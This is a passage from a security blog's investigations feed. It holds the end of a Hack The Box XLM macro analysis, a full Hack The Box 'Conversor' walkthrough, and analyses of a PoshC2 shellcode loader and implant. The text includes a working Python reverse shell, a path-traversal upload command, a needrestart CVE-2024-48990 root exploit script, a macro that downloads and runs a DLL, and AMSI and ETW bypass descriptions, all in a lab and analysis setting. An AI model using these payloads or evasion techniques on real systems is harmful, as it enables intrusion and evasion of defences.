c1zB0vasN,R1190,\u0026#34;CALL(F1220,Q1000,\u0026#34;JJCCJJ\u0026#34;,0,H60,G1332,0,0)\u0026#34;,\u0026#34;\u0026#34; 47\u0026#39; c1zB0vasN,R1191,\u0026#34;CALL(L554,I180,\u0026#34;JJCCCCJ\u0026#34;,0,\u0026#34;Open\u0026#34;,\u0026#34;rundll32.exe\u0026#34;,CONCATENATE(G1332,D8,D513,K390),0,0)\u0026#34;,\u0026#34;\u0026#34; 48\u0026#39; c1zB0vasN,R1192,GOTO(A1338),\u0026#34;\u0026#34; 49\u0026#39; c1zB0vasN,F1220,\u0026#34;CONCATENATE(K1184,Y420,D450)\u0026#34;,\u0026#34;\u0026#34; 50\u0026#39; c1zB0vasN,K1225,\u0026#34;CONCATENATE(Q880,V1048)\u0026#34;,\u0026#34;\u0026#34; 51\u0026#39; c1zB0vasN,C1300,GOTO(Q222),\u0026#34;\u0026#34; 52\u0026#39; c1zB0vasN,G1332,\u0026#34;CONCATENATE(P1047,C593,C1040)\u0026#34;,\u0026#34;\u0026#34; 53\u0026#39; c1zB0vasN,D1337,\u0026#34;IF(F100\u0026lt;300,ON.TIME(NOW()+\u0026#34;00:00:02\u0026#34;,A1),ON.TIME(NOW()+\u0026#34;00:00:02\u0026#34;,\u0026#34;KsshpqC4Mo\u0026#34;))\u0026#34;,\u0026#34;\u0026#34; 54\u0026#39; c1zB0vasN,A1338,\u0026#34;FORMULA.FILL(\u0026#34;a\u0026#34;,R~0C~0)\u0026#34;,\u0026#34;\u0026#34; 55\u0026#39; c1zB0vasN,A1339,HALT(),\u0026#34;\u0026#34; i see\nCALL() to Windows APIs CONCATENATE() functions (likely obfuscating strings) GET.WORKSPACE() environment checks rundll32.exe execution File download functionality Key suspicious indicators:\nURLDownloadToFileA ShellExecuteA rundll32.exe Conditional OS/version checks Deobfuscation # To evaluate macro behavior, I used xlmdeobfuscator emulation\n1$ xlmdeobfuscator --file oBfsC4t10n2.xls 2...[snip]... 3 4$ olevba oBfsC4t10n2.xls 5...[snip]... 6\u0026#39; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 7\u0026#39; EMULATION - DEOBFUSCATED EXCEL4/XLM MACRO FORMULAS: 8\u0026#39; CELL:N545 , PartialEvaluation , =document.HIDE(\u0026#34;c1zB0vasNO\u0026#34;,TRUE) 9\u0026#39; CELL:N546 , FullEvaluation , GET.WORKSPACE(1) 10\u0026#39; CELL:N547 , Branching , IF(ISNUMBER(SEARCH(\u0026#34;Windows\u0026#34;,N546)),ON.TIME(NOW()+\u0026#34;00:00:02\u0026#34;,\u0026#34;agawf23f\u0026#34;),CLOSE(FALSE)) 11\u0026#39; CELL:N547 , FullEvaluation , [TRUE] ON.TIME(NOW()+\u0026#34;00:00:02\u0026#34;,\u0026#34;agawf23f\u0026#34;) 12\u0026#39; CELL:D8 , Branching , IF(GET.WORKSPACE(42.0),CONCATENATE(E394,F1194,F549,E635,O697,U208,T458,M868,Z4,U777),CONCATENATE(F394,F1194,E549,O635,U697,D777)) 13\u0026#39; CELL:D8 , FullEvaluation , [TRUE] \u0026#34; HTB{n0w_e\u0026#34; 14\u0026#39; CELL:D9 , FullEvaluation , GET.WORKSPACE(13) 15\u0026#39; CELL:D10 , FullEvaluation , GOTO(C1300) 16\u0026#39; CELL:C1300 , FullEvaluation , GOTO(Q222) 17\u0026#39; CELL:Q222 , Branching , IF(GET.WORKSPACE(19.0),ON.TIME(NOW()+\u0026#34;00:00:02\u0026#34;,\u0026#34;rstegerg3\u0026#34;),CLOSE(TRUE)) 18\u0026#39; CELL:Q222 , FullEvaluation , [TRUE] ON.TIME(NOW()+\u0026#34;00:00:02\u0026#34;,\u0026#34;rstegerg3\u0026#34;) 19\u0026#39; CELL:T698 , Branching , IF(OR(D9\u0026lt;700.0),ON.TIME(NOW()+\u0026#34;00:00:02\u0026#34;,A1),ON.TIME(NOW()+\u0026#34;00:00:02\u0026#34;,\u0026#34;Lsl23Us7a\u0026#34;)) 20\u0026#39; CELL:T698 , FullEvaluation , [FALSE] ON.TIME(NOW()+\u0026#34;00:00:02\u0026#34;,\u0026#34;Lsl23Us7a\u0026#34;) 21\u0026#39; CELL:D1337 , Branching , IF(F100\u0026lt;300.0,ON.TIME(NOW()+\u0026#34;00:00:02\u0026#34;,A1),ON.TIME(NOW()+\u0026#34;00:00:02\u0026#34;,\u0026#34;KsshpqC4Mo\u0026#34;)) 22\u0026#39; CELL:D1337 , FullEvaluation , [FALSE] ON.TIME(NOW()+\u0026#34;00:00:02\u0026#34;,\u0026#34;KsshpqC4Mo\u0026#34;) 23\u0026#39; CELL:D1023 , Branching , IF(ISNUMBER(SEARCH(\u0026#34;6.1\u0026#34;,N546)),CONCATENATE(Z699,L932,J1190,C574,J644,A718,E813),CONCATENATE(A699,E932,K1190,J574,A644,Z718,W813)) 24\u0026#39; CELL:D1023 , FullEvaluation , [FALSE] \u0026#34;A$0!(rR\u0026#34; 25\u0026#39; CELL:D1024 , FullEvaluation , GOTO(R1186) 26\u0026#39; CELL:R1186 , FullEvaluation , GET.WORKSPACE(1) 27\u0026#39; CELL:R1187 , FullEvaluation , IF(NOT(ISNUMBER(SEARCH(\u0026#34;7.0\u0026#34;,R1186))),CLOSE(FALSE)) 28\u0026#39; CELL:R1188 , FullEvaluation , CALL(\u0026#34;Kernel32\u0026#34;,\u0026#34;CreateDirectoryA\u0026#34;,\u0026#34;JCJ\u0026#34;,\u0026#34;C:\\rncwner\u0026#34;,0) 29\u0026#39; CELL:R1189 , FullEvaluation , CALL(\u0026#34;Kernel32\u0026#34;,\u0026#34;CreateDirectoryA\u0026#34;,\u0026#34;JCJ\u0026#34;,\u0026#34;C:\\rncwner\\CkkYKlI\u0026#34;,0) 30\u0026#39; CELL:R1190 , FullEvaluation , CALL(\u0026#34;URLMON\u0026#34;,\u0026#34;URLDownloadToFileA\u0026#34;,\u0026#34;JJCCJJ\u0026#34;,0,\u0026#34;http://0b.htb/s.dll\u0026#34;,\u0026#34;C:\\rncwner\\CkuiQhTXx.dll\u0026#34;,0,0) 31\u0026#39; CELL:R1191 , FullEvaluation , CALL(\u0026#34;Shell32\u0026#34;,\u0026#34;ShellExecuteA\u0026#34;,\u0026#34;JJCCCCJ\u0026#34;,0,\u0026#34;Open\u0026#34;,\u0026#34;rundll32.exe\u0026#34;,\u0026#34;C:\\rncwner\\CkuiQhTXx.dllIF(GET.WORKSPACE(42.0),CONCATENATE(E394,F1194,F549,E635,O697,U208,T458,M868,Z4,U777),CONCATENATE(F394,F1194,E549,O635,U697,D777))Xc3l_4.0_M4IF(ISNUMBER(SEARCH(\u0026#34;\u0026#34;6.1\u0026#34;\u0026#34;,N546)),CONCATENATE(Z699,L932,J1190,C574,J644,A718,E813),CONCATENATE(A699,E932,K1190,J574,A644,Z718,W813))}\u0026#34;,0,0) 32\u0026#39; CELL:R1192 , FullEvaluation , GOTO(A1338) 33\u0026#39; CELL:A1338 , FullEvaluation , FORMULA.FILL(\u0026#34;a\u0026#34;,A1:Z1337) 34\u0026#39; CELL:A1339 , End , HALT() 35\u0026#39; CELL:D1023 , FullEvaluation , [FALSE] \u0026#34;aaaaaaa\u0026#34; 36\u0026#39; CELL:D8 , FullEvaluation , [TRUE] \u0026#34;aaaaaaaaaa\u0026#34; The deobfuscated stream reveals the following behavior:\nHiding the document: document.HIDE(\u0026ldquo;c1zB0vasNO\u0026rdquo;,TRUE) Anti-Sandbox: The script checks for specific environment characteristics before proceeding. GET.WORKSPACE(1) checks the OS version GET.WORKSPACE(13) checks screen workspace size GET.WORKSPACE(19) checks if a mouse is present GET.WORKSPACE(42) checks if audio capabilities are present It attempts to create a directory structure on the C: drive. 1CALL(\u0026#34;Kernel32\u0026#34;,\u0026#34;CreateDirectoryA\u0026#34;,\u0026#34;JCJ\u0026#34;,\u0026#34;C:\\rncwner\u0026#34;,0) 2CALL(\u0026#34;Kernel32\u0026#34;,\u0026#34;CreateDirectoryA\u0026#34;,\u0026#34;JCJ\u0026#34;,\u0026#34;C:\\rncwner\\CkkYKlI\u0026#34;,0) It downloads a DLL from a remote host using URLDownloadToFileA. 1CALL(\u0026#34;URLMON\u0026#34;,\u0026#34;URLDownloadToFileA\u0026#34;,\u0026#34;JJCCJJ\u0026#34;,0,\u0026#34;http://0b.htb/s.dll\u0026#34;,\u0026#34;C:\\rncwner\\CkuiQhTXx.dll\u0026#34;,0,0) It executes the downloaded DLL using rundll32.exe. 1CALL(\u0026#34;Shell32\u0026#34;,\u0026#34;ShellExecuteA\u0026#34;,\u0026#34;JJCCCCJ\u0026#34;,0,\u0026#34;Open\u0026#34;,\u0026#34;rundll32.exe\u0026#34;,\u0026#34;C:\\rncwner\\CkuiQhTXx.dll...\u0026#34;,0,0) Flag Reconstruction # Analyzing cell R1191 reveals the flag embedded in the rundll32 command line:\nPart 1: Cell D8 (when GET.WORKSPACE(42) = TRUE)\n1\u0026#39; CELL:D8, FullEvaluation, [TRUE] \u0026#34; HTB{n0w_e\u0026#34; Part 2: Hardcoded string\n1\u0026#34;Xc3l_4.0_M4\u0026#34; Part 3: Cell D1023 (when Windows version ≠ 6.1)\n1\u0026#39; CELL:D1023, FullEvaluation, [FALSE] \u0026#34;cr0s_r_b4cK}\u0026#34; Complete flag:\n1HTB{n0w_eXc3l_4.0_M4cr0s_r_b4cK} Attack Flow # %%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%% graph TD %% --- Styling Definitions --- classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef input fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef check fill:#fff9c4,stroke:#fbc02d,stroke-width:2px,stroke-dasharray: 5 5,color:#000; classDef exec fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000; classDef term fill:#e0e0e0,stroke:#333,stroke-width:2px,color:#000; %% --- Flow Logic --- User([User Opens oBfsC4t10n2.xls]):::input --\u003e|Enable Content| AutoExec[Auto_Open / XLM Macros Start]:::input subgraph Anti_Sandbox [Anti-Sandbox / Evasion] direction TB AutoExec --\u003e CheckOS{Check OSGET.WORKSPACE 1}:::check CheckOS -- \"Contains 'Windows'\" --\u003e CheckAudio{Check AudioGET.WORKSPACE 42}:::check CheckAudio -- \"Audio Present\" --\u003e CheckMouse{Check MouseGET.WORKSPACE 19}:::check %% Fail Conditions CheckOS -.-\u003e|Fail| Close[Close Workbook]:::term CheckAudio -.-\u003e|Fail| Close CheckMouse -.-\u003e|Fail| Close end subgraph Payload_Construction [Payload Construction] CheckMouse ==\u003e|Pass| Deobfuscate[Deobfuscate StringsCONCATENATE \u0026 FORMULA.FILL] end subgraph Execution_Chain [Execution Chain] Deobfuscate --\u003e CreateDir[Create DirectoryC:\\rncwner]:::exec CreateDir --\u003e Download[Download DLLURLDownloadToFileA]:::exec Download -- \"http://0b.htb/s.dll\" --\u003e SaveDll[Save PayloadC:\\rncwner\\CkuiQhTXx.dll]:::exec SaveDll --\u003e RunDll[Execute PayloadShellExecuteA]:::exec RunDll -- \"rundll32.exe\" --\u003e Compromise((System Compromised)):::exec end ","date":"January 20, 2026","externalUrl":null,"permalink":"/investigations/htb-obfsc4t10n2/","section":"","summary":"","title":"HTB-oBfsC4t10n2","type":"investigations"},{"content":"","date":"January 20, 2026","externalUrl":null,"permalink":"/tags/oleid/","section":"Tags","summary":"","title":"Oleid","type":"tags"},{"content":"","date":"January 20, 2026","externalUrl":null,"permalink":"/tags/xlm-macros/","section":"Tags","summary":"","title":"Xlm-Macros","type":"tags"},{"content":"","date":"January 20, 2026","externalUrl":null,"permalink":"/tags/xlmdeobfuscator/","section":"Tags","summary":"","title":"Xlmdeobfuscator","type":"tags"},{"content":"","date":"January 19, 2026","externalUrl":null,"permalink":"/tags/cve-2024-48990/","section":"Tags","summary":"","title":"CVE-2024-48990","type":"tags"},{"content":"","date":"January 19, 2026","externalUrl":null,"permalink":"/tags/file-upload/","section":"Tags","summary":"","title":"File-Upload","type":"tags"},{"content":" Difficulty: Easy OS: Linux Date: 2026-01-19 TL;DR # Flask web application vulnerable to path traversal during file uploads. Exploited by uploading Python reverse shell to cron-executed directory → gained www-data shell → extracted MD5 hashes from SQLite database → cracked password for user fismathack → leveraged CVE-2024-48990 in needrestart 3.7 for privilege escalation to root.\nRecon # port scanning # nmap identifies 2 open TCP ports: 22 (SSH) and 80 (HTTP)\n1bubka@bubka$ nmap 10.129.4.129 -p- -A --min-rate 5000 2Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-19 06:23 -0500 3Nmap scan report for 10.129.4.129 4Host is up (0.051s latency). 5Not shown: 65533 closed tcp ports (reset) 6PORT STATE SERVICE VERSION 722/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0) 8| ssh-hostkey: 9| 256 01:74:26:39:47:bc:6a:e2:cb:12:8b:71:84:9c:f8:5a (ECDSA) 10|_ 256 3a:16:90:dc:74:d8:e3:c4:51:36:e2:08:06:26:17:ee (ED25519) 1180/tcp open http Apache httpd 2.4.52 12|_http-title: Did not follow redirect to http://conversor.htb/ 13|_http-server-header: Apache/2.4.52 (Ubuntu) 14Device type: general purpose|router 15Running: Linux 5.X, MikroTik RouterOS 7.X 16OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 17OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) 18Network Distance: 2 hops 19Service Info: Host: conversor.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel 20 21TRACEROUTE (using port 8888/tcp) 22HOP RTT ADDRESS 231 35.97 ms 10.10.14.1 242 35.93 ms 10.129.4.129 25 26OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 27Nmap done: 1 IP address (1 host up) scanned in 24.69 seconds I added the host domain to my /etc/hosts file.\n1bubka@bubka$ tail -1 /etc/hosts 210.129.4.129 conversor.htb Website Enumeration # The website features a login form Clicking \u0026ldquo;Register\u0026rdquo; redirects to a registration page where I created an account The application converts XML and XSLT files into HTML I downloaded the source code from the \u0026ldquo;About\u0026rdquo; page. 1. 2├── app.py 3├── app.wsgi 4├── install.md 5├── instance 6│ └── users.db 7├── scripts 8├── static 9│ ├── images 10│ │ ├── arturo.png 11│ │ ├── david.png 12│ │ └── fismathack.png 13│ ├── nmap.xslt 14│ └── style.css 15├── templates 16│ ├── about.html 17│ ├── base.html 18│ ├── index.html 19│ ├── login.html 20│ ├── register.html 21│ └── result.html 22└── uploads Source code analysis # intresting stuff was founded in app.py and install.md. The application is built with Python Flask. In app.py i found that XSLT file dont use parser configuration like XLM do. no filename sanitization was found in the upload handler, enabling path traversal attacks.\napp.py:\n1...[snip]... 2parser = etree.XMLParser(resolve_entities=False, no_network=True, dtd_validation=False, load_dtd=False) 3xml_tree = etree.parse(xml_path, parser) 4xslt_tree = etree.parse(xslt_path) # no parse configuration 5...[snip]... resolve_entities=False (prevents the parser from resolving entities into their values) no_network=True (prevent making any network requests during XML processing) dtd_validation=False (disables validation of the document against a DTD) load_dtd=False (prevents loading external DTD) install.md reveals a cron job that executes all Python scripts in /var/www/conversor.htb/scripts/ every minute.\n1...[snip]... 2You can also run it with Apache using the app.wsgi file. 3If you want to run Python scripts (for example, our server deletes all files older than 60 minutes to avoid system overload), you can add the following line to your /etc/crontab. 4\u0026#34;\u0026#34;\u0026#34; 5* * * * * www-data for f in /var/www/conversor.htb/scripts/*.py; do python3 \u0026#34;$f\u0026#34;; done 6\u0026#34;\u0026#34;\u0026#34; 7...[snip]... Exploitation # Attack-Vector: Arbitrary File Upload via Path Traversal to Cron RCE.\nThe application does not sanitize filenames properly. I can upload a Python reverse shell and use path traversal (../scripts/) to save it into the directory executed by the cronjob\n1bubka@bubka$ cat exploit.py 2import socket,subprocess,os 3s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 4s.connect((\u0026#34;10.10.14.80\u0026#34;,5323)) 5os.dup2(s.fileno(),0) 6os.dup2(s.fileno(),1) 7os.dup2(s.fileno(),2) 8import pty; pty.spawn(\u0026#34;/bin/bash\u0026#34;) 9 10bubka@bubka$ curl -X POST http://conversor.htb/convert \\ 11 -F \u0026#34;xml_file=@exploit.py;filename=../scripts/exploit.py\u0026#34; \\ 12 -F \u0026#34;xslt_file=@exploit.py;filename=sex.xsl\u0026#34; \\ 13 -b \u0026#34;session=eyJ1c2VyX2lkIjo1LCJ1c2VybmFtZSI6ImJ1YmthIn0.aW574A.k5FrGy9C5elqfuPqbua7WiA3Img\u0026#34; Shell as www-data # 1bubka@bubla$ nc -lvnp 5323 2listening on [any] 5323 ... 3connect to [10.10.14.80] from (UNKNOWN) [10.129.4.226] 51018 4www-data@conversor:~$ i know that exist database. Analyzing users.db revealed hashes for users \u0026lsquo;fismathack\u0026rsquo;\n1www-data@conversor:~$ sqlite3 /var/www/conversor.htb/instance/users.db \u0026#34;SELECT * FROM users;\u0026#34; 2\u0026lt;versor.htb/instance/users.db \u0026#34;SELECT * FROM users;\u0026#34; 31|fismathack|5b5c3ac3a1c897c94caad48e6c71fdec 45|bubka|d6f23513481dcdbb81a197a16ea36c5f cracking fismathack MD5 hash\n1bubka@bubka$ echo \u0026#34;5b5c3ac3a1c897c94caad48e6c71fdec\u0026#34; \u0026gt; hash.txt 2bubka@bubka$ hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt --show 35b5c3ac3a1c897c94caad48e6c71fdec:Keepmesafeandwarm Shell as fismathack # using ssh with Keepmesafeandwarm password\n1bubka@bubka$ ssh fismathack@conversor.htb 2...[snip]... 3fismathack@conversor:~$ whoami 4fismathack getting user flag\n1fismathack@conversor:~$ cat ~/user.txt 255362fe3efcdfdcc6d8f0b6c474d4b6d Shell as root # 1fismathack@conversor:~$ sudo -l 2Matching Defaults entries for fismathack on conversor: 3 env_reset, mail_badpass, 4 secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin, use_pty 5 6User fismathack may run the following commands on conversor: 7 (ALL : ALL) NOPASSWD: /usr/sbin/needrestart 8 9fismathack@conversor:~$ needrestart --version 10 11needrestart 3.7 - Restart daemons after library updates. 12...[snip]... checking sudo -l revealed that fismathack can run /usr/sbin/needrestart without a password. The installed version is 3.7. This version is vulnerable to CVE-2024-48990 (Local Privilege Escalation), which allows arbitrary code execution via the -c config flag.\nI wrote a Python script to automate the exploitation: Create a malicious Perl config file that copies /bin/bash and sets the SUID bit. Execute sudo needrestart pointing to this config. Spawn the SUID shell.\npriv.py:\n1#!/usr/bin/env python3 2import os 3import sys 4import subprocess 5 6config = \u0026#34;/tmp/bu.conf\u0026#34; 7shell = \u0026#34;/tmp/bash\u0026#34; 8payload = f\u0026#39;system(\u0026#34;cp /bin/bash {shell} \u0026amp;\u0026amp; chmod 4755 {shell}\u0026#34;);\u0026#39; 9 10try: 11 with open(config, \u0026#34;w\u0026#34;) as f: 12 f.write(payload) 13 14 subprocess.run([\u0026#34;sudo\u0026#34;, \u0026#34;needrestart\u0026#34;, \u0026#34;-c\u0026#34;, config], check=True) 15 16 if os.path.exists(config): 17 os.remove(config) 18 19 if os.path.exists(shell): 20 os.execl(shell, shell, \u0026#34;-p\u0026#34;) 21 22except Exception as e: 23 print(f\u0026#34;Unexpected error: {e}\u0026#34;) 24 sys.exit(1) Root obtained.\n1fismathack@conversor:~$ python3 priv.py 2Scanning processes... 3Scanning linux images... 4 5Running kernel seems to be up-to-date. 6 7No services need to be restarted. 8 9No containers need to be restarted. 10 11No user sessions are running outdated binaries. 12 13No VM guests are running outdated hypervisor (qemu) binaries on this host. 14rootbash-5.1# whoami 15root 16rootbash-5.1# and flag:\n1rootbash-5.1# cat /root/root.txt 22ddbf40c03a3c45866748ea7e8c69444 ","date":"January 19, 2026","externalUrl":null,"permalink":"/investigations/htb-conversor/","section":"","summary":"Flask web application vulnerable to path traversal during file uploads. Exploited by uploading Python reverse shell to cron-executed directory → gained www-data shell → extracted MD5 hashes from SQLite database → cracked password for user fismathack → leveraged CVE-2024-48990 in needrestart 3.7 for privilege escalation to root.","title":"HTB-Conversor","type":"investigations"},{"content":"","date":"January 19, 2026","externalUrl":null,"permalink":"/tags/needrestart/","section":"Tags","summary":"","title":"Needrestart","type":"tags"},{"content":"","date":"January 19, 2026","externalUrl":null,"permalink":"/tags/sqlite/","section":"Tags","summary":"","title":"Sqlite","type":"tags"},{"content":"","date":"January 19, 2026","externalUrl":null,"permalink":"/tags/web/","section":"Tags","summary":"","title":"Web","type":"tags"},{"content":" TL;DR # A .NET DLL selects one of two embedded base64-encoded shellcode blobs based on process architecture (x86/x64), decodes it, allocates RWX memory, and executes it via CreateThread. The shellcode performs three evasion steps — NTDLL unhooking, AMSI bypass, and ETW bypass — then executes an embedded PE32 payload identified as a PoshC2 Dropper-cs.exe.\nInitial Analysis # 1Sharp_v4_x64.dll: PE32+ executable (DLL) x86-64 Mono/.Net assembly, 3 sections 2SHA256: 56ed93571e83ca344757d8ce809b5bf8ed5004cdeea92a40ea486b8478b7b26e imports # 3 P/Invoke imports from kernel32.dll used for shellcode injection:\n1VirtualAlloc p/Invoke kernel32.dll 2VirtualProtect p/Invoke kernel32.dll 3CreateThread p/Invoke kernel32.dll This RW→RWX pattern is a indicator of shellcode injection - allocate as writable, write payload, then flip to executable before spawning a thread.\n1PAGE_READWRITE → initial allocation 2PAGE_EXECUTE_READWRITE → after VirtualProtect call Static Analysis # DNspy # The DLL was decompiled with dnSpy. The Main method contains two large base64 strings — one for x86 (s2) and one for x64 (s). Architecture is determined via IntPtr.Size:\n1private static void Main(string[] args) 2{ 3 byte[] array = null; 4 string s = \u0026#34;6AAAAABZSYnISIHBIwsAALpFd2Iw...\u0026#34;; // x64 shellcode 5 string s2 = \u0026#34;6AAAAABYVYnlicIF/wsAAIHC/1MC...\u0026#34;; // x86 shellcode 6...[snip]... The execution flow is: decode base64 -\u0026gt; allocate RW memory -\u0026gt; copy shellcode -\u0026gt; change protection to RWX via VirtualProtect -\u0026gt; execute via CreateThread -\u0026gt; block indefinitely with WaitOne.\n1 if (IntPtr.Size == 4) 2 array = Convert.FromBase64String(s2); 3 else if (IntPtr.Size == 8) 4 array = Convert.FromBase64String(s); 5 6 IntPtr intPtr = Program.VirtualAlloc(IntPtr.Zero, 7 (IntPtr)(array.Length * 2), 8 Program.AllocationType.COMMIT, 9 Program.Protection.PAGE_READWRITE); 10 11 if (intPtr != IntPtr.Zero) 12 { 13 uint num = 0U; 14 uint num2 = 0U; 15 Marshal.Copy(array, 0, intPtr, array.Length); 16 Program.VirtualProtect(intPtr, (IntPtr)(array.Length * 2), 17 Program.Protection.PAGE_EXECUTE_READWRITE, out num); 18 Program.CreateThread(IntPtr.Zero, 0U, intPtr, 19 IntPtr.Zero, 0U, out num2); 20 WaitHandle waitHandle = new EventWaitHandle(false, 21 EventResetMode.ManualReset); 22 waitHandle.WaitOne(); 23 } IDA # Checking strings revelad that the shellcode contains a configuration block that controls which evasion features are enabled at runtime:\n1AMS=1 → AMSI bypass enabled 2ETW=1 → ETW bypass enabled 3NTD=0 → NTDLL unhooking disabled 4DLL=1 → DLL mode 5SLP=0 → Sleep evasion disabled NTDLL Unhooking # The shellcode contains a function that bypasses EDR/AV hooks by replacing the in-memory ntdll.dll .text section with a clean copy loaded directly from disk via LoadLibraryEx with flag 0x80000000 (map as data file, not executed). This restores any syscall stubs that may have been patched with EDR trampolines back to their original bytes.\nAMSI Bypass # The shellcode locates AmsiScanBuffer in memory and patches its entry point with a ret instruction, causing all subsequent AMSI scan calls to return immediately without scanning.\nETW Bypass # The shellcode locates EtwEventWrite in ntdll and patches its first byte with 0xC3 (ret), disabling Event Tracing for Windows and preventing the OS from logging telemetry about shellcode execution.\nEmbedded PE # The shellcode contains an embedded base64-encoded PE identified by the TVqQ magic header (MZ signature):\n1seg000:000000000001BA58 TVqQAAMAAAAEAAAA/AALgAAAA... Extracted with Python:\n1import base64 2import re 3 4with open(\u0026#34;mw.bin\u0026#34;, \u0026#34;rb\u0026#34;) as f: 5 dadta = f.read() 6 7m = re.search(b\u0026#39;TVqQAAMAAAAEAAAA[A-Za-z0-9+/=]+\u0026#39;, d) 8pe = base64.b64decode(m.group(0)) 9 10with open(\u0026#34;mw_extracted.exe\u0026#34;, \u0026#34;wb\u0026#34;) as out: 11 out.write(pe) 1$ file mw_extracted.exe 2mw_extracted.exe: PE32 executable (console) Intel i386 Mono/.Net assembly, 3 sections SHA256 comparison confirmed this is identical to the previously analyzed Dropper-cs.exe — full analysis available here:\n18e5eeb667a962dbee803572f951d08a65c67a42ecb6d6eaf8ebaaf3681e26154 mw_extracted.exe 28e5eeb667a962dbee803572f951d08a65c67a42ecb6d6eaf8ebaaf3681e26154 dropper_cs.exe IOCs # Files\nSharp_v4_x64.dll — .NET shellcode loader\n- SHA256: 56ed93571e83ca344757d8ce809b5bf8ed5004cdeea92a40ea486b8478b7b26e\nmw_extracted.exe — embedded PoshC2 dropper\n- SHA256: 8e5eeb667a962dbee803572f951d08a65c67a42ecb6d6eaf8ebaaf3681e26154\nAttack Flow # %%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%% graph TD classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef input fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef check fill:#fff9c4,stroke:#fbc02d,stroke-width:2px,stroke-dasharray: 5 5,color:#000; classDef exec fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000; classDef term fill:#e0e0e0,stroke:#333,stroke-width:2px,color:#000; Load([Sharp_v4_x64.dll Loaded]):::input --\u003e Main[Main - Entrypoint]:::input subgraph Shellcode_Selection [Shellcode Selection] Main --\u003e ArchCheck{IntPtr.Size}:::check ArchCheck -- \"== 4 (x86)\" --\u003e DecodeX86[FromBase64String s2]:::exec ArchCheck -- \"== 8 (x64)\" --\u003e DecodeX64[FromBase64String s]:::exec end subgraph Injection [Memory Injection] DecodeX86 --\u003e Alloc[VirtualAlloc RW]:::exec DecodeX64 --\u003e Alloc Alloc --\u003e Copy[Marshal.Copy shellcode to memory]:::exec Copy --\u003e Protect[VirtualProtect → RWX]:::exec Protect --\u003e Thread[CreateThread]:::exec end subgraph Evasion [Evasion] Thread --\u003e NTD{NTD=0}:::check NTD -- Enabled --\u003e Unhook[NTDLL Unhookingreplace .text from disk]:::exec NTD -- Disabled --\u003e AMSI Unhook --\u003e AMSI{AMS=1}:::check AMSI -- Enabled --\u003e AMSIPatch[AmsiScanBuffer → ret]:::exec AMSI -- Disabled --\u003e ETW AMSIPatch --\u003e ETW{ETW=1}:::check ETW -- Enabled --\u003e ETWPatch[EtwEventWrite → ret]:::exec ETW -- Disabled --\u003e PE ETWPatch --\u003e PE end subgraph Payload [Embedded Payload] PE[Extract embedded PETVqQ base64]:::exec --\u003e Dropper((Dropper-cs.exePoshC2)):::exec end ","date":"November 25, 2025","externalUrl":null,"permalink":"/investigations/poschc2-sharp_v4_x64.dll/","section":"","summary":"A .NET DLL decodes architecture-specific shellcode from an embedded base64 string, allocates executable memory, and spawns a thread to execute it. The shellcode performs NTDLL unhooking, AMSI and ETW patching before executing an embedded PE payload identified as a PoshC2 dropper.","title":"PoshC2: Sharp_v4_x64.dll","type":"investigations"},{"content":"","date":"November 23, 2025","externalUrl":null,"permalink":"/tags/poshc2/","section":"Tags","summary":"","title":"PoshC2","type":"tags"},{"content":" TL;DR # dropper_cs.exe is a PoshC2 C# implant. An AES-encrypted C2 configuration is embedded directly in the binary, decrypted at runtime to reveal the C2 address, beacon interval, session key, and URI pattern. The implant contacts 192.168.248.128:443, sending an AES-encrypted system fingerprint disguised as a SessionID cookie. Outbound data is padded with real image bytes to evade network inspection. All communication is encrypted with AES-CBC and SSL validation is disabled to allow self-signed certificates.\nOnce staging completes, the implant enters an indefinite beacon loop (KillDate: 2999-01-01), polling the C2 every 5 seconds ±20% jitter for commands. It supports 13+ commands including in-memory assembly execution, live reconfiguration, modular payload loading via Stage2-Core.exe, and named pipe communication for lateral movement. All operations are fileless — nothing is written to disk.\n1SHA256 8E5EEB667A962DBEE803572F951D08A65C67A42ECB6D6EAF8EBAAF3681E26154 2Family PoshC2 — C# implant 3C2 https://192.168.248.128 4URI /vfe01s/1/vsopts.js/?c 5BeaconSleep 5s ± 20% jitter 6KillDate 2999-01-01 7Encryption AES-CBC, 256-bit key initial analysis # 1$ file * 2dropper_cs.exe: PE32 executable for MS Windows 4.00 (console), Intel i386 Mono/.Net assembly, 3 sections SHA256: 8E5EEB667A962DBEE803572F951D08A65C67A42ECB6D6EAF8EBAAF3681E26154\nlibraries # Confirmed that is .NET executable by seen a huge amount of mscoree.dl (Microsoft .NET Runtime Execution Engine) imports # 1VirtualProtect KERNEL32.dll 2GetCurrentThread KERNEL32.dll 3TerminateThread KERNEL32.dll 4GetConsoleWindow KERNEL32.dll - VirtualProtect + PAGE_EXECUTE_READWRITE field: marks memory regions as executable, shellcode injection technique\n- GetConsoleWindow + ShowWindow(SW_HIDE): hides console window from user\n1Load mscoree.dll (runtime) 2CreateDomain, DoCallBack, Unload mscoree.dll (runtime) 3RunEphemeralAssembly, ActivateLoader mscoree.dll (runtime) 4RunTempAppDomain, RunAssembly mscoree.dll (runtime) - loads and executes assemblies directly from bytes, 